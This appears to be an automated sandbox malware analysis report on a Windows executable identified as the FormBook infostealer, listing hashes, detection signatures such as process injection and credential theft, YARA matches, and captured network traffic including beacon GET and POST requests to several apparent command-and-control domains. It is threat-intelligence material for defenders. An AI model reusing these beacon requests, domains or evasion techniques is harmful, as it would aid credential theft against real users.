Windows Analysis Report
CMV610942X6UI.exe

Overview

General Information

Sample name: CMV610942X6UI.exe
Analysis ID: 1467082
MD5: c9dd16ae393fc240bcf80fda156e7f1a
SHA1: 9f73e0a2fe75f46e68cef5fd57f54c410004dd1e
SHA256: 48d19b1644c9d67726df35e5ca07970db83813e981ec75a0eaa89960d8b5d020
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://www.tutoringservices-jp.space/7kq8/ Avira URL Cloud: Label: phishing
Source: http://www.tutoringservices-jp.space/7kq8/?Efup=gtM5/A+y2ZoJWEDfDaE+2w6kJ8M6pgUfoEVlPe5CjlMa7apflPEeb4hE3FwUuugxFTbEVrAuO+b6prDKuBbSe95OhQpk0L9IAVb1ZHk0JEw5+OIIQunEo+vX5ya5UUiI4w==&5X=Wrl4wnYP Avira URL Cloud: Label: phishing
Multi AV Scanner detection for submitted file
Source: CMV610942X6UI.exe ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: CMV610942X6UI.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: CMV610942X6UI.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: CMV610942X6UI.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: systray.pdb source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261143467.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sxkr.pdbSHA256M source: CMV610942X6UI.exe
Source: Binary string: systray.pdbGCTL source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261143467.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sxkr.pdb source: CMV610942X6UI.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZkqZZBQxQqm.exe, 00000007.00000000.1716110923.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858183726.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: CMV610942X6UI.exe, 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1791760271.0000000005025000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1790150372.0000000004E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: CMV610942X6UI.exe, CMV610942X6UI.exe, 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1791760271.0000000005025000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1790150372.0000000004E7B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0324B7F0 FindFirstFileW,FindNextFileW,FindClose, 8_2_0324B7F0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then xor eax, eax 8_2_03239640
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 8_2_0323DB5B
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then mov ebx, 00000004h 8_2_04FC053E
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.59.243.226 199.59.243.226
Source: Joe Sandbox View IP Address: 203.161.62.199 203.161.62.199
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bakr/?Efup=XDoTgsrtu8W4rBGfVFPBe+VTMhp4aj1fDDoEglHaJ5OOwDCoRETt6EMOwV71ZOd09KZu8+ugWGfmhcxQhERPkTRicN45Uigraquu8zuJ3nqxw5c62M4XByCrclFahX0wxg==&5X=Wrl4wnYP HTTP/1.1Host: www.thirstythursdaywines.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYP HTTP/1.1Host: www.aotuqiye.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /w7zx/?Efup=4nFzxviigBNCR0XnJkvhNhUb0o3qDKAKJVt5c0EBpnWfgFZ7hCzAhg6W/oCSYblqABe344EIzDMItVaOjGR7QKZXmGlK5CURSd3zTznCfgDClaltbyP35QucHh8Re5qnMA==&5X=Wrl4wnYP HTTP/1.1Host: www.marinestoreng.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /d5d3/?Efup=XQbeRjD/PDdWBh12NU+ykUl2F4dvHc6VXEhqzGSjB3wJSjcs0xwI8Icac1G5+8QpiM7OSYRY7+DwwJfqawKXGWKHnDunR+LM5fl2Yw480JpoJUWygYqvECbW/AkZxLcv1w==&5X=Wrl4wnYP HTTP/1.1Host: www.zethcraft.infoAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiXOWq2hFnbSrpYq5tfQM8qwnGlhpBH7wUMA2rqYfQo8R+3WIcA6o0TPRBDA7dTlRc+xV9X/9AN+Ulg==&5X=Wrl4wnYP HTTP/1.1Host: www.herplaatsingscoach.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYP HTTP/1.1Host: www.aotuqiye.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /7kq8/?Efup=gtM5/A+y2ZoJWEDfDaE+2w6kJ8M6pgUfoEVlPe5CjlMa7apflPEeb4hE3FwUuugxFTbEVrAuO+b6prDKuBbSe95OhQpk0L9IAVb1ZHk0JEw5+OIIQunEo+vX5ya5UUiI4w==&5X=Wrl4wnYP HTTP/1.1Host: www.tutoringservices-jp.spaceAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /9tym/?Efup=0S/ZPq6i4295YU31CGsIF3+6CX49wr8UBlIPMbX3EHvT6GYfIlkKvIaQUZZ23gNfBRY92LbOf61zdN1D+KaxZKPZCNQTzZg2JqvKwBvhTNR6FU45NnpKZwAnu57SnFRcaQ==&5X=Wrl4wnYP HTTP/1.1Host: www.mommysdaycare.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /siy1/?Efup=K3jVd2QwvP/vE5bLqRwLiG/ouCi2dCf8HcrsXZX+iIcvtfjJNCMaZ4cNZ/78hy4DUFhEXV0DZOcTULe6zQ1rJbzjmaVovzYps5hxNWqkCnG6IikFfqhaq5tMJN6I5yDLJQ==&5X=Wrl4wnYP HTTP/1.1Host: www.kwytruband.cloudAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic DNS traffic detected: DNS query: www.thirstythursdaywines.com
Source: global traffic DNS traffic detected: DNS query: www.aotuqiye.com
Source: global traffic DNS traffic detected: DNS query: www.marinestoreng.com
Source: global traffic DNS traffic detected: DNS query: www.zethcraft.info
Source: global traffic DNS traffic detected: DNS query: www.herplaatsingscoach.com
Source: global traffic DNS traffic detected: DNS query: www.tapnly.online
Source: global traffic DNS traffic detected: DNS query: www.tutoringservices-jp.space
Source: global traffic DNS traffic detected: DNS query: www.mommysdaycare.net
Source: global traffic DNS traffic detected: DNS query: www.kwytruband.cloud
Source: unknown HTTP traffic detected: POST /kyls/ HTTP/1.1Host: www.aotuqiye.comAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.aotuqiye.comConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 205Referer: http://www.aotuqiye.com/kyls/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 45 66 75 70 3d 6d 44 43 6b 6e 69 77 63 46 38 62 53 79 30 6b 4d 77 6a 4e 42 43 50 59 2b 6b 76 68 6a 38 55 76 65 6e 41 72 37 54 66 2b 59 67 35 56 38 67 48 67 6c 41 33 52 6b 48 55 45 6d 46 6e 58 38 65 6b 68 43 43 69 67 7a 4e 73 47 48 6c 58 50 37 30 63 63 55 75 69 50 6d 34 49 39 42 37 41 32 38 67 72 73 34 70 56 72 69 75 47 2f 51 4e 6b 71 45 72 4b 69 36 36 73 77 35 73 71 72 6b 42 6f 58 4c 6d 55 7a 31 36 65 66 4a 48 63 32 4b 76 71 39 4d 41 64 34 57 4e 38 2b 44 72 35 6e 4f 66 6b 68 69 65 66 2b 41 32 38 6f 4e 41 6e 37 68 61 7a 4f 4e 74 6c 51 69 65 51 33 4f 52 67 7a 65 61 70 2b 41 61 4a 61 45 6d 39 77 69 72 73 51 3d Data Ascii: Efup=mDCkniwcF8bSy0kMwjNBCPY+kvhj8UvenAr7Tf+Yg5V8gHglA3RkHUEmFnX8ekhCCigzNsGHlXP70ccUuiPm4I9B7A28grs4pVriuG/QNkqErKi66sw5sqrkBoXLmUz16efJHc2Kvq9MAd4WN8+Dr5nOfkhief+A28oNAn7hazONtlQieQ3ORgzeap+AaJaEm9wirsQ=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:15 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 7a 68 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 69 67 68 74 20 64 61 72 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 0d 0a 20 20 20 20 20 20 20 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 37 20 54 68 65 20 43 68 72 6f 6d 69 75 6d 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 2a 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 20 2a 2f 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 29 3b 20 7d 20 62 6f 64 79 20 7b 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 2d 2d 65 72 72 6f 72 2d 63 6f 64 65 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 37 30 30 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 31 30 30 3a 20 72 67 62 28 32 31 30 2c 20 32 32 37 2c 20 32 35 32 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 33 30 30 3a 20 72 67 62 28 31 33 38 2c 20 31 38 30 2c 20 32 34 38 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 36 30 30 3a 20 72 67 62 28 32 36 2c 20 31 31 35 2c 20 32 33 32 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 37 30 30 3a 20 72 67 62 28 32 35 2c 20 31 30 33 2c 20 32 31 30 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 31 30 30 3a 20 72 67 62 28 32 34 31 2c 20 32 34 33 2c 20 32 34 34 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 33 30 30 3a 20 72 67 62 28 32 31 38 2c 20 32 32 30 2c 20 32 32 34 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 35 30 30 3a 20 72 67 62 28 31 35 34 2c 20 31 36 30 2c 20 31 36 36 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 35 30 3a 20 72 67 62 28 32 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:31 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13dVTfHYnF%2B54q10zl9jO2Hbalyann%2BSEIptouMuDsopV85s%2BzfodXDb%2FWrbx3sKhgNSztsRgpkF0Kxq%2FZO4CTs7vDdSRKppgo8RNSsDMGQFATKrgOmTrEy7Bwq1lxbxNUSQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81b28fb0a4285-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:34 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuj47DiGHxRi23bvBISW0hBjFmGEzBagfIUmtPZZdghxW7dHQ1CRURzk0EtmASkPcHCYT6jlcqqKKBtl1TL9KOCR7ECmRye8ICrz0ZnHUs9hclkg8lwn09OBFiXRqC0QP3Ym"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81b38dd170f75-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:36 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LSb7t4%2BRSr00bHcHijycoU%2FLm1BlbPvXGLX6WgYQjSeIFxwpIZ9DKDGANCgirGGlDqNAdvguoI%2B1uGwwJ%2BveEQO%2F1tDhHEZ%2BiT%2FIKFnuKBbimTzcmc35DTV4UeC4JDKKFuG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81b487b9f7c99-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:39 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlzKg4fMkjUhVuW%2B7L9njtXQLEF5vUd42OM%2FBOCvnZ8WAx4Xg9etZEK9O9tYdjfgi6vVbvDtu48cbL5JFhSxVLunPJaUBRDtyj8mI2oq3kIvpga6vAAK7DHn35bsUReLHH35"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81b585a6341df-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data 